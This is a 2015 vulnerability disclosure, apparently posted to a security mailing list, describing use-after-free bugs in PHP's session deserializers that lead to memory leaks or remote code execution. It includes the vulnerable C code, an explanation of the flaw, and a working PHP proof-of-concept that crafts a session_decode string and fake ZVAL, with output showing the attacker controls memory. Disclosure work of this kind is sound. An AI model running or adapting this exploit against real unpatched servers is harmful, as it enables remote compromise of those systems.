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Use After Free Vulnerabilities in Session Deserializer


From: Taoguang Chen <taoguangchen () gmail com>
Date: Sat, 5 Sep 2015 10:18:41 +0800

#Use After Free Vulnerabilities in Session Deserializer

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.8.9
- Release Date: 2015.9.4

Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that 
can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------
```
PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
{

        ...     

        PHP_VAR_UNSERIALIZE_INIT(var_hash);

        p = val;

        while (p < endptr) {
                
                ...

                if (has_value) {
                        ALLOC_INIT_ZVAL(current);
                        if (php_var_unserialize(&current, (const unsigned char **) &q,
(const unsigned char *) endptr, &var_hash TSRMLS_CC)) {
                                php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);
                        }
                        zval_ptr_dtor(&current);
                }
                PS_ADD_VARL(name, namelen);
skip:
                efree(name);

                p = q;
        }
break_outer_loop:

        PHP_VAR_UNSERIALIZE_DESTROY(var_hash);

        return SUCCESS;
}
```

When session deserializer (php/php_binary) deserializing multiple data
it will call to php_var_unserialize() multiple times. So we can create
ZVAL and free it via the php_var_unserialize() with a crafted
serialized string, and also free the memory (reduce the reference
count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two
identical session data, then the next call to php_var_unserialize()
will still allow to use R: or r: to set references to that already
freed memory. It is possible to use-after-free attack and execute
arbitrary code remotely.

In some other cases, session deserializer
(php/php_binary/php_serialize) may also lead to use-after-free
vulnerabilities: i) via crafted Serializable::unserialize() ii) via
unserialize()'s callback function and zend_lookup_class() call a
crafted __autoload().

Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44.

```
<?php

session_start();

$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";

$exploit = 'ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;chtg|a:1:{i:0;R:4;}';
// $exploit = 'ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;';
session_decode($exploit);

for ($i = 0; $i < 5; $i++) {
    $v[$i] = $fakezval.$i;
}

var_dump($_SESSION);

function ptr2str($ptr)
{
        $out = "";
        for ($i = 0; $i < 8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Test the PoC on the command line:

```
$ php uafpoc.php
array(2) {
  ["ryat"]=>
  NULL
  ["chtg"]=>
  array(1) {
    [0]=>
    int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
  }
}
```

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